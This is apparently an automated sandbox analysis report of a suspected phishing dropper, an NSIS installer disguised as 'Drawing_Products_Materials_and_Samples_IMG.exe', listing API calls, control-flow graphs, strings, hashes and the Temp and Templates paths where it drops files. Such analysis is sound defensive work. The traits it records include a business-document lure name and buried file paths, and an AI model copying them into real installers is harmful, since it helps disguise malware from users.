                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050AC
                                                                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BF
                                                                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050CD
                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050E0
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405102
                                                                                      • ShowWindow.USER32(?,?), ref: 00405116
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405137
                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405147
                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405160
                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040516C
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405044
                                                                                        • Part of subcall function 00403EC1: SendMessageA.USER32(?,?,00000001,00403CF2), ref: 00403ECF
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405189
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004F5B,00000000), ref: 00405197
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040519E
                                                                                      • ShowWindow.USER32(00000000), ref: 004051C2
                                                                                      • ShowWindow.USER32(0001040C,?), ref: 004051C7
                                                                                      • ShowWindow.USER32(?), ref: 0040520E
                                                                                      • SendMessageA.USER32(0001040C,00001004,00000000,00000000), ref: 00405240
                                                                                      • CreatePopupMenu.USER32 ref: 00405251
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405266
                                                                                      • GetWindowRect.USER32(0001040C,?), ref: 00405279
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040529D
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D8
                                                                                      • OpenClipboard.USER32(00000000), ref: 004052E8
                                                                                      • EmptyClipboard.USER32 ref: 004052EE
                                                                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F7
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405301
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405315
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040532E
                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405339
                                                                                      • CloseClipboard.USER32 ref: 0040533F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: Unnarcotic33 Setup: Installing${

                                                                                      Control-flow Graph (entry block 405b9e-405ba9; graph rendering not reproduced)
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,00404EC1,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000), ref: 00405C4F
                                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CCA
                                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CDD
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,007904A8), ref: 00405D19
                                                                                      • SHGetPathFromIDListA.SHELL32(007904A8,Call), ref: 00405D27
                                                                                      • CoTaskMemFree.OLE32(007904A8), ref: 00405D32
                                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D54
                                                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,00404EC1,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000), ref: 00405DA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                      Control-flow Graph (entry block 405459-40547f; graph rendering not reproduced)
                                                                                      APIs
                                                                                      • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 00405482
                                                                                      • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004054CA
                                                                                      • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004054EB
                                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004054F1
                                                                                      • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 00405502
                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AF
                                                                                      • FindClose.KERNEL32(00000000), ref: 004055C0
                                                                                      Strings
                                                                                      • \*.*, xrefs: 004054C4
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405467
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00405459
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$C:\Users\user\AppData\Local\Temp\$\*.*

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040586D
                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405887
                                                                                      Strings
                                                                                      • nsa, xrefs: 00405864
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040585C, 00405860
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00405859
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-573509740
                                                                                      • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                                                      • Instruction ID: 4aebe10c88a2e36316dbf067ffd0f1b8a4e5ad9d66982a0f7a9d71ca3a6838ad
                                                                                      • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                                                      • Instruction Fuzzy Hash: E3F082377083046BDB109F66DC04B9B7B9CDF95750F14C037FE44DA190D6B499548B59

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 00402089
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\AppData\Local\jazy.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 00402143
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging, xrefs: 004020C1
                                                                                      • C:\Users\user\AppData\Local\jazy.lnk, xrefs: 0040212C, 00402136, 00402152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                      • String ID: C:\Users\user\AppData\Local\jazy.lnk$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging
                                                                                      • API String ID: 123533781-2336559525
                                                                                      • Opcode ID: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                                                                      • Instruction ID: f40fdd2f837a9ef4581bc193a6a0bea3429b4c51dfd852c6190c3096ceffc06e
                                                                                      • Opcode Fuzzy Hash: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                                                                      • Instruction Fuzzy Hash: 86415F75A00205AFCB00DFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB55
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNELBASE(?,007A0548,Grundsprogs.but,0040575A,Grundsprogs.but,Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410), ref: 00405E8B
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405E97
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: Grundsprogs.but
                                                                                      • API String ID: 2295610775-3503724756
                                                                                      • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                                                      • Instruction ID: 6833435bd7c55ba6949cdbc3f534d3e11c9bb8cd8424a8444c2420f5768f04fc
                                                                                      • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                                                      • Instruction Fuzzy Hash: E2D012719494205BC7441738ED0C8AF7A59DB5A3317204F32B4A9F12E0C3389D628AE9
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403134,?), ref: 00405EB9
                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00403134,?), ref: 00405EC4
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                      • String ID:
                                                                                      • API String ID: 310444273-0
                                                                                      • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                                                      • Instruction ID: 12aa124b33c0948ddb41e5fcbe9811a0bcf46c48a2c09d507a8af2750e30391c
                                                                                      • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                                                      • Instruction Fuzzy Hash: BAE08C32A04611ABC6219B209E0896B77ACEA88A41301497EF945F6151D734AC119BBA

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F5
                                                                                      • ShowWindow.USER32(?), ref: 00403A12
                                                                                      • DestroyWindow.USER32 ref: 00403A26
                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A42
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403A63
                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A77
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403A7E
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403B2C
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403B36
                                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B50
                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BA1
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403C47
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403C68
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C7A
                                                                                      • EnableWindow.USER32(?,?), ref: 00403C95
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CAB
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403CB2
                                                                                      • SendMessageA.USER32(?,?,00000000,00000001), ref: 00403CCA
                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CDD
                                                                                      • lstrlenA.KERNEL32(Unnarcotic33 Setup: Installing,?,Unnarcotic33 Setup: Installing,007A1F00), ref: 00403D06
                                                                                      • SetWindowTextA.USER32(?,Unnarcotic33 Setup: Installing), ref: 00403D15
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403E49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 3282139019-3016879369
                                                                                      • Opcode ID: 6d8ad34e300cf5008380b3153d116323a5e10cdd91790160abe8f1fa8dda5f0d
                                                                                      • Instruction ID: e60f831e91f574596bba605afa47ae8b2d4b4441763b235232076e0cc55ea590
                                                                                      • Opcode Fuzzy Hash: 6d8ad34e300cf5008380b3153d116323a5e10cdd91790160abe8f1fa8dda5f0d
                                                                                      • Instruction Fuzzy Hash: FBC1C271904200BBEB21AF61ED45E2B3EACFB46706F04453EF641B11E1C77DA9429B6E

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 268 403627-40363f call 405ea7 271 403641-403651 call 405ada 268->271 272 403653-403684 call 405a63 268->272 281 4036a7-4036d0 call 4038ec call 405717 271->281 277 403686-403697 call 405a63 272->277 278 40369c-4036a2 lstrcatA 272->278 277->278 278->281 286 4036d6-4036db 281->286 287 403757-40375f call 405717 281->287 286->287 288 4036dd-403701 call 405a63 286->288 293 403761-403768 call 405b9e 287->293 294 40376d-403792 LoadImageA 287->294 288->287 295 403703-403705 288->295 293->294 297 403813-40381b call 40140b 294->297 298 403794-4037c4 RegisterClassA 294->298 299 403716-403722 lstrlenA 295->299 300 403707-403714 call 405654 295->300 311 403825-403830 call 4038ec 297->311 312 40381d-403820 297->312 301 4038e2 298->301 302 4037ca-40380e SystemParametersInfoA CreateWindowExA 298->302 306 403724-403732 lstrcmpiA 299->306 307 40374a-403752 call 405629 call 405b7c 299->307 300->299 304 4038e4-4038eb 301->304 302->297 306->307 310 403734-40373e GetFileAttributesA 306->310 307->287 315 403740-403742 310->315 316 403744-403745 call 405670 310->316 321 403836-403853 ShowWindow LoadLibraryA 311->321 322 4038b9-4038ba call 404f5b 311->322 312->304 315->307 315->316 316->307 323 403855-40385a LoadLibraryA 321->323 324 40385c-40386e GetClassInfoA 321->324 328 4038bf-4038c1 322->328 323->324 326 403870-403880 GetClassInfoA RegisterClassA 324->326 327 403886-4038a9 DialogBoxParamA call 40140b 324->327 326->327 333 4038ae-4038b7 call 403577 327->333 330 4038c3-4038c9 328->330 331 4038db-4038dd call 40140b 328->331 330->312 334 4038cf-4038d6 call 40140b 330->334 331->301 333->304 334->312
                                                                                      APIs
                                                                                        • Part of subcall function 00405EA7: GetModuleHandleA.KERNEL32(?,?,?,00403134,?), ref: 00405EB9
                                                                                        • Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?,?,?,00403134,?), ref: 00405EC4
                                                                                        • Part of subcall function 00405EA7: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                                                      • lstrcatA.KERNEL32(1033,Unnarcotic33 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Unnarcotic33 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,773E3410,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000000), ref: 004036A2
                                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid,1033,Unnarcotic33 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Unnarcotic33 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403717
                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040372A
                                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403735
                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid), ref: 0040377E
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      • RegisterClassA.USER32(007A1EA0), ref: 004037BB
                                                                                      • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004037D3
                                                                                      • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403808
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 0040383E
                                                                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384F
                                                                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040385A
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 0040386A
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403877
                                                                                      • RegisterClassA.USER32(007A1EA0), ref: 00403880
                                                                                      • DialogBoxParamA.USER32(?,00000000,004039B9,00000000), ref: 0040389F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Unnarcotic33 Setup: Installing$_Nb
                                                                                      • API String ID: 914957316-178227565
                                                                                      • Opcode ID: dc7206f8326d23eec4fcbdc0fea1e05ba2c42fac82f34ab169e21e38d3f74469
                                                                                      • Instruction ID: 5a8f3a480c3ff0a7316bfe3ed3e84a823a8107e4b5d9873dcf131b1b59b1fd9f
                                                                                      • Opcode Fuzzy Hash: dc7206f8326d23eec4fcbdc0fea1e05ba2c42fac82f34ab169e21e38d3f74469
                                                                                      • Instruction Fuzzy Hash: E761D5715442406EE710BB659C85F373AACD78575AF00857EFA05B22E2C67DAD018A2D

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 339 402c33-402c81 GetTickCount GetModuleFileNameA call 40582a 342 402c83-402c88 339->342 343 402c8d-402cbb call 405b7c call 405670 call 405b7c GetFileSize 339->343 344 402e65-402e69 342->344 351 402cc1 343->351 352 402da8-402db6 call 402bcf 343->352 354 402cc6-402cdd 351->354 359 402db8-402dbb 352->359 360 402e0b-402e10 352->360 355 402ce1-402ce3 call 403072 354->355 356 402cdf 354->356 361 402ce8-402cea 355->361 356->355 362 402dbd-402dce call 4030a4 call 403072 359->362 363 402ddf-402e09 GlobalAlloc call 4030a4 call 402e6c 359->363 360->344 365 402cf0-402cf7 361->365 366 402e12-402e1a call 402bcf 361->366 379 402dd3-402dd5 362->379 363->360 390 402e1c-402e2d 363->390 369 402d73-402d77 365->369 370 402cf9-402d0d call 4057e5 365->370 366->360 374 402d81-402d87 369->374 375 402d79-402d80 call 402bcf 369->375 370->374 388 402d0f-402d16 370->388 381 402d96-402da0 374->381 382 402d89-402d93 call 405f19 374->382 375->374 379->360 385 402dd7-402ddd 379->385 381->354 389 402da6 381->389 382->381 385->360 385->363 388->374 392 402d18-402d1f 388->392 389->352 393 402e35-402e3a 390->393 394 402e2f 390->394 392->374 396 402d21-402d28 392->396 395 402e3b-402e41 393->395 394->393 395->395 397 402e43-402e5e SetFilePointer call 4057e5 395->397 396->374 398 402d2a-402d31 396->398 401 402e63 397->401 398->374 400 402d33-402d53 398->400 400->360 402 402d59-402d5d 400->402 401->344 403 402d65-402d6d 402->403 404 402d5f-402d63 402->404 403->374 405 402d6f-402d71 403->405 404->389 404->403 405->374
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402C44
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,00000400), ref: 00402C60
                                                                                        • Part of subcall function 0040582A: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 0040582E
                                                                                        • Part of subcall function 0040582A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 00402CAC
                                                                                      Strings
                                                                                      • Null, xrefs: 00402D2A
                                                                                      • soft, xrefs: 00402D21
                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                                                                      • C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                                      • Inst, xrefs: 00402D18
                                                                                      • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                                                                      • Error launching installer, xrefs: 00402C83
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00402C33
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                      • API String ID: 4283519449-3569344066
                                                                                      • Opcode ID: 29234429f16db235ec7e4964410a2920a6584f8896d7f8ce12431abf0ce67768
                                                                                      • Instruction ID: 67f90bf762a0a8549ff8da05f1705a54a2dc0587b06dee9d11c49c0032f29009
                                                                                      • Opcode Fuzzy Hash: 29234429f16db235ec7e4964410a2920a6584f8896d7f8ce12431abf0ce67768
                                                                                      • Instruction Fuzzy Hash: 18510671D00204ABDB209F65DE89B6E7BA8EF44314F14403BFA04B62D1C7BC9E418BAD

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 537 40173f-401762 call 402a07 call 405696 542 401764-40176a call 405b7c 537->542 543 40176c-40177e call 405b7c call 405629 lstrcatA 537->543 549 401783-401789 call 405de7 542->549 543->549 553 40178e-401792 549->553 554 401794-40179e call 405e80 553->554 555 4017c5-4017c8 553->555 563 4017b0-4017c2 554->563 564 4017a0-4017ae CompareFileTime 554->564 557 4017d0-4017ec call 40582a 555->557 558 4017ca-4017cb call 405805 555->558 565 401864-40188d call 404e89 call 402e6c 557->565 566 4017ee-4017f1 557->566 558->557 563->555 564->563 580 401895-4018a1 SetFileTime 565->580 581 40188f-401893 565->581 567 4017f3-401835 call 405b7c * 2 call 405b9e call 405b7c call 4053ad 566->567 568 401846-401850 call 404e89 566->568 567->553 601 40183b-40183c 567->601 578 401859-40185f 568->578 582 4028a5 578->582 584 4018a7-4018b2 CloseHandle 580->584 581->580 581->584 585 4028a7-4028ab 582->585 587 4018b8-4018bb 584->587 588 40289c-40289f 584->588 589 4018d0-4018d3 call 405b9e 587->589 590 4018bd-4018ce call 405b9e lstrcatA 587->590 588->582 596 4018d8-402229 call 4053ad 589->596 590->596 596->585 601->578 602 40183e-40183f 601->602 602->568
                                                                                      APIs
                                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,00000000,00000000,00000031), ref: 0040177E
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,00000000,00000000,00000031), ref: 004017A8
                                                                                        • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                        • Part of subcall function 00404E89: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                        • Part of subcall function 00404E89: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsw1382.tmp$C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging$Call

                                                                                      Control-flow Graph (first basic block: 404e88-404e9e)
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                      • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
